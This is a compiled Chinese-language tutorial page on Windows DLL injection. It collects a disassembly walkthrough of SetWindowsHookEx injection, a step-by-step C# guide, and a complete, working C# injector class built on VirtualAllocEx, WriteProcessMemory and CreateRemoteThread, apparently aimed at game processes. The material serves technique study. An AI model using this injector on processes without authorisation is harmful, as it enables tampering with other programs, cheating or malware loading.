上圖雖然不是進(jìn)程的整個(gè)流圖，但是我們可以看到主要的SetWindowsHookEx部分。首先通過(guò)LoadLibraryA加載inject.dll。可以注意到，param1 在每個(gè)函數(shù)調(diào)用前被使用。將偏移地址保存在第一個(gè)參數(shù)所在的堆棧地址中。因此它獲得注入函數(shù)（dllMethod）的地址，之后將DLL的句柄賦給param1，調(diào)用GetProcAddress。最后，加載SetWindowsHookEx的參數(shù)值，并調(diào)用函數(shù)。對(duì)比下第二個(gè)函數(shù)。


圖片8.png


相比之下只有一個(gè)不同點(diǎn)，將threadID復(fù)制至寄存器中，之后再將其復(fù)制至第四個(gè)參數(shù)所在的堆棧地址中，再調(diào)用SetWindowsHookEx函數(shù)。是不是還不錯(cuò)？在下一篇將準(zhǔn)備開(kāi)寫(xiě)遠(yuǎn)程線程注入方法，期待吧！


參考資料


http://win32assembly.programminghorizon.com/tut24.html


https://www.daniweb.com/software-development/cpp/code/217096/keylogger-using-window-hooks


https://msdn.microsoft.com/en-us/library/windows/desktop/ms644990%28v=vs.85%29.aspx


http://blogs.msdn.com/b/oldnewthing/archive/2006/02/23/537856.aspx


http://www.binarytides.com/winsock-socket-programming-tutorial/


http://resources.infosecinstitute.com/using-setwindowshookex-for-dll-injection-on-windows/


http://blog.opensecurityresearch.com/2013/01/windows-dll-injection-basics.html


https://github.com/malark3y/DLL-Injection


https://warroom.securestate.com/index.php/real-world-malware-analysis/
========

使用C#完成DLL注入

http://blog.sina.com.cn/s/blog_4bd471210100s8qa.html
dll目錄不能有中文


關(guān)于DLL注入，我們這里不討論這個(gè)技術(shù)的應(yīng)用，只關(guān)注于技術(shù)的實(shí)現(xiàn)，由于最近一直在學(xué)習(xí)C#所以就想使用C#來(lái)試試，其實(shí)這個(gè)注入跟什么編程語(yǔ)言沒(méi)有多大的關(guān)系，由于都是調(diào)用API實(shí)現(xiàn)的，又由于最近看的都是C#的，所以希望這里不會(huì)對(duì)朋友們?cè)斐烧`解！
? ? ? ? ? ??
? ? 在開(kāi)始編程之前，我們先找一個(gè)dll文件，這里我準(zhǔn)備了一個(gè)DLL


[轉(zhuǎn)載]使用C#完成DLL注入
這里我是使用EditPlus編寫(xiě)的，朋友們也可以使用VC++來(lái)編寫(xiě)一個(gè)DLL。
這個(gè)DLL中主要就是注入后會(huì)在注入的目標(biāo)程序的根目錄生成一個(gè)txt文件。
?
DLL準(zhǔn)備完畢后，還要準(zhǔn)備一個(gè)目標(biāo)程序，主要就是將DLL注入到這個(gè)程序，由于我是測(cè)試，就隨便寫(xiě)了個(gè)目標(biāo)程序，朋友們也可以用系統(tǒng)中現(xiàn)有的程序來(lái)作為目標(biāo)，比如QQ，計(jì)算器啦，等等！


[轉(zhuǎn)載]使用C#完成DLL注入
接下來(lái)我們就嘗試下完成DLL的注入。
主要步驟：
? ? ? ? ?A:通過(guò)窗體的Title或者進(jìn)程信息找到程序的句柄。
? ? ? ? ?B:獲得進(jìn)程句柄、分配內(nèi)存。
? ? ? ? ?C:寫(xiě)入數(shù)據(jù)。
? ? ? ? ?D:創(chuàng)建線程執(zhí)行。
?
A：查找到目標(biāo)程序
主要用的API有：
? ? ? ? ?[DllImport("user32.dll", EntryPoint = "FindWindow")]
private extern static IntPtr FindWindow(string lpClassName, string lpWindowName);
?
[DllImport("User32.dll", CharSet = CharSet.Auto)]
public static extern int GetWindowThreadProcessId(IntPtr hwnd, out int ID);
? ? ? ? ?
當(dāng)然獲得句柄的方法有很多，這里我就用這種方法做演示。
?
調(diào)用函數(shù)找到窗體(這里找的是窗體的)：
IntPtr hwnd = FindWindow(null, "目標(biāo)程序");
查找進(jìn)程的ID
int PID;
GetWindowThreadProcessId(hwnd, out PID);
?
B：
? ? ? ? ?主要用的API有：
? ? ? ? ?[DllImport("kernel32.dll")]
? ? ?public static extern int OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);
? ??
? ? ?[DllImport("kernel32.dll")]
? ? ?public static extern int VirtualAllocEx(int hwnd, int lpaddress, int size, int type, int tect);
?
? ? ? ? ?調(diào)用函數(shù)獲得操作的句柄
? ? ? ? ?int calcProcess = OpenProcess(2 | 8| 32, false, PID);
? ? ?分配內(nèi)存空間，獲得首地址
? ? ?int address = VirtualAllocEx(calcProcess, 0, @"D:\dll.dll".Length + 1, 4096, 64);
?
C：
? ? ? ? ?主要用到的API是：
? ? ? ? ?[DllImport("kernel32.dll")]
? ? ?public static extern int WriteProcessMemory(int hwnd, int baseaddress, string buffer, int nsize, int filewriten);
? ??
? ? ?調(diào)用函數(shù)寫(xiě)入內(nèi)存
? ? ?if (WriteProcessMemory(calcProcess, address, @"D:\dll.dll", @"D:\dll.dll".Length + 1, 0) == 0)
? ? ?{
? ? ? ?MessageBox.Show("寫(xiě)入內(nèi)存失敗！");
? ? ?}
?
D：
? ? ? ? ?主要用到的API有：
? ? ? ? ?[DllImport("kernel32.dll")]
? ? ?public static extern int GetModuleHandleA(string name);
?
? ? [DllImport("kernel32.dll")]
public static extern int GetProcAddress(int hwnd, string lpname);
?
[DllImport("kernel32.dll")]
public static extern int CreateRemoteThread(int hwnd, int attrib, int size, int address, int par, int flags, int threadid);
?
調(diào)用Kernel32 的LoadLibraryA 方法來(lái)加載咱們的DLL
if (CreateRemoteThread(calcProcess, 0, 0, GetProcAddress(GetModuleHandleA("Kernel32"), "LoadLibraryA"), address, 0, 0) == 0)
? ? ? ? MessageBox.Show("創(chuàng)建失敗！");
? ? else
? ? ? ? MessageBox.Show("成功");
========

通用 C# DLL 注入器injector(注入dll不限)

http://www.cnblogs.com/meyon/p/4009248.html
? 為了方便那些不懂或者不想用C++的同志，我把C++的dll注入器源碼轉(zhuǎn)換成了C#的，這是一個(gè)很簡(jiǎn)單實(shí)用的注入器，用到了CreateRemoteThread，WriteProcessMemory ，VirtualAllocEx這幾個(gè)Api


? 1 using System;
? 2 using System.Diagnostics;
? 3 using System.IO;
? 4 using System.Runtime.InteropServices;
? 5 using System.Text;
? 6?
? 7 namespace GijSoft.DllInjection
? 8 {
? 9 ? ? public enum DllInjectionResult
?10 ? ? {
?11 ? ? ? ? DllNotFound,
?12 ? ? ? ? GameProcessNotFound,
?13 ? ? ? ? InjectionFailed,
?14 ? ? ? ? Success
?15 ? ? }
?16?
?17 ? ? public sealed class DllInjector
?18 ? ? {
?19 ? ? ? ? static readonly IntPtr INTPTR_ZERO = (IntPtr)0;
?20?
?21 ? ? ? ? [DllImport("kernel32.dll", SetLastError = true)]
?22 ? ? ? ? static extern IntPtr OpenProcess(uint dwDesiredAccess, int bInheritHandle, uint dwProcessId);
?23?
?24 ? ? ? ? [DllImport("kernel32.dll", SetLastError = true)]
?25 ? ? ? ? static extern int CloseHandle(IntPtr hObject);
?26?
?27 ? ? ? ? [DllImport("kernel32.dll", SetLastError = true)]
?28 ? ? ? ? static extern IntPtr GetProcAddress(IntPtr hModule, string lpProcName);
?29?
?30 ? ? ? ? [DllImport("kernel32.dll", SetLastError = true)]
?31 ? ? ? ? static extern IntPtr GetModuleHandle(string lpModuleName);
?32?
?33 ? ? ? ? [DllImport("kernel32.dll", SetLastError = true)]
?34 ? ? ? ? static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, IntPtr dwSize, uint flAllocationType, uint flProtect);
?35?
?36 ? ? ? ? [DllImport("kernel32.dll", SetLastError = true)]
?37 ? ? ? ? static extern int WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] buffer, uint size, int lpNumberOfBytesWritten);
?38?
?39 ? ? ? ? [DllImport("kernel32.dll", SetLastError = true)]
?40 ? ? ? ? static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttribute, IntPtr dwStackSize, IntPtr lpStartAddress,
?41 ? ? ? ? ? ? IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
?42?
?43 ? ? ? ? static DllInjector _instance;
?44?
?45 ? ? ? ? public static DllInjector GetInstance
?46 ? ? ? ? {
?47 ? ? ? ? ? ? get
?48 ? ? ? ? ? ? {
?49 ? ? ? ? ? ? ? ? if (_instance == null)
?50 ? ? ? ? ? ? ? ? {
?51 ? ? ? ? ? ? ? ? ? ? _instance = new DllInjector();
?52 ? ? ? ? ? ? ? ? }
?53 ? ? ? ? ? ? ? ? return _instance;
?54 ? ? ? ? ? ? }
?55 ? ? ? ? }
?56?
?57 ? ? ? ? DllInjector() { }
?58?
?59 ? ? ? ? public DllInjectionResult Inject(string sProcName, string sDllPath)
?60 ? ? ? ? {
?61 ? ? ? ? ? ? if (!File.Exists(sDllPath))
?62 ? ? ? ? ? ? {
?63 ? ? ? ? ? ? ? ? return DllInjectionResult.DllNotFound;
?64 ? ? ? ? ? ? }
?65?
?66 ? ? ? ? ? ? uint _procId = 0;
?67?
?68 ? ? ? ? ? ? Process[] _procs = Process.GetProcesses();
?69 ? ? ? ? ? ? for (int i = 0; i < _procs.Length; i++)
?70 ? ? ? ? ? ? {
?71 ? ? ? ? ? ? ? ? if (_procs[i].ProcessName == sProcName)
?72 ? ? ? ? ? ? ? ? {
?73 ? ? ? ? ? ? ? ? ? ? _procId = (uint)_procs[i].Id;
?74 ? ? ? ? ? ? ? ? ? ? break;
?75 ? ? ? ? ? ? ? ? }
?76 ? ? ? ? ? ? }
?77?
?78 ? ? ? ? ? ? if (_procId == 0)
?79 ? ? ? ? ? ? {
?80 ? ? ? ? ? ? ? ? return DllInjectionResult.GameProcessNotFound;
?81 ? ? ? ? ? ? }
?82?
?83 ? ? ? ? ? ? if (!bInject(_procId, sDllPath))
?84 ? ? ? ? ? ? {
?85 ? ? ? ? ? ? ? ? return DllInjectionResult.InjectionFailed;
?86 ? ? ? ? ? ? }
?87?
?88 ? ? ? ? ? ? return DllInjectionResult.Success;
?89 ? ? ? ? }
?90?
?91 ? ? ? ? bool bInject(uint pToBeInjected, string sDllPath)
?92 ? ? ? ? {
?93 ? ? ? ? ? ? IntPtr hndProc = OpenProcess((0x2 | 0x8 | 0x10 | 0x20 | 0x400), 1, pToBeInjected);
?94?
?95 ? ? ? ? ? ? if (hndProc == INTPTR_ZERO)
?96 ? ? ? ? ? ? {
?97 ? ? ? ? ? ? ? ? return false;
?98 ? ? ? ? ? ? }
?99?
100 ? ? ? ? ? ? IntPtr lpLLAddress = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
101?
102 ? ? ? ? ? ? if (lpLLAddress == INTPTR_ZERO)
103 ? ? ? ? ? ? {
104 ? ? ? ? ? ? ? ? return false;
105 ? ? ? ? ? ? }
106?
107 ? ? ? ? ? ? IntPtr lpAddress = VirtualAllocEx(hndProc, (IntPtr)null, (IntPtr)sDllPath.Length, (0x1000 | 0x2000), 0X40);
108?
109 ? ? ? ? ? ? if (lpAddress == INTPTR_ZERO)
110 ? ? ? ? ? ? {
111 ? ? ? ? ? ? ? ? return false;
112 ? ? ? ? ? ? }
113?
114 ? ? ? ? ? ? byte[] bytes = Encoding.ASCII.GetBytes(sDllPath);
115?
116 ? ? ? ? ? ? if (WriteProcessMemory(hndProc, lpAddress, bytes, (uint)bytes.Length, 0) == 0)
117 ? ? ? ? ? ? {
118 ? ? ? ? ? ? ? ? return false;
119 ? ? ? ? ? ? }
120?
121 ? ? ? ? ? ? if (CreateRemoteThread(hndProc, (IntPtr)null, INTPTR_ZERO, lpLLAddress, lpAddress, 0, (IntPtr)null) == INTPTR_ZERO)
122 ? ? ? ? ? ? {
123 ? ? ? ? ? ? ? ? return false;
124 ? ? ? ? ? ? }
125?
126 ? ? ? ? ? ? CloseHandle(hndProc);
127?
128 ? ? ? ? ? ? return true;
129 ? ? ? ? }
130 ? ? }
131 }


注意：使用時(shí)必須安裝.netFramework
========

總結(jié)

以上是生活随笔為你收集整理的DLL注入学习总结的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。